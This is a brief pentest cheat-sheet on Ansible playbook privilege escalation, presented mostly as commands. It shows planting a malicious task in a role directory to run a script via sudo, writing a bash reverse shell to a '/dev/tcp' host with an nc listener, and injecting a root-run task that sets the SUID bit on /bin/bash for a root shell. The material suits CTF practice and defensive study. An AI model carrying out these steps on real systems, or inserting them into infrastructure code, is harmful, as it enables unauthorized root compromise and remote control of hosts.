Ansible Playbook Privilege Escalation

Ansible Playbooks are lists of tasks that automatically execute against hosts.

PrivEsc with Tasks

First off, check the content of playbook in /opt/ansible/playbooks. For instance, a file named “httpd.yaml”.

- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...
Copied!

Next, check the content of configure files in /opt/ansible/roles/geerlingguy.apache/tasks. And add the exploitable file in this. For example, a file named “shell.yml”.

- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
Copied!

Create a exploit for reverse shell.

echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
Copied!

Then open a listener in local machine.

nc -lvnp <local-port>
Copied!

At the end, execute “ansible”

ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible
Copied!

PrivEsc with Automation Task

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (tasks/), we can inject arbitrary commands in yaml file. For example, create a new file /opt/ansible/tasks/evil.yaml.

- hosts: localhost
	tasks:
	  - name: Evil
	    ansible.builtin.shell: |
	      chmod +s /bin/bash
	    become: true
Copied!

After a while, we can escalate the root privilege by executing the following command.

/bin/bash -p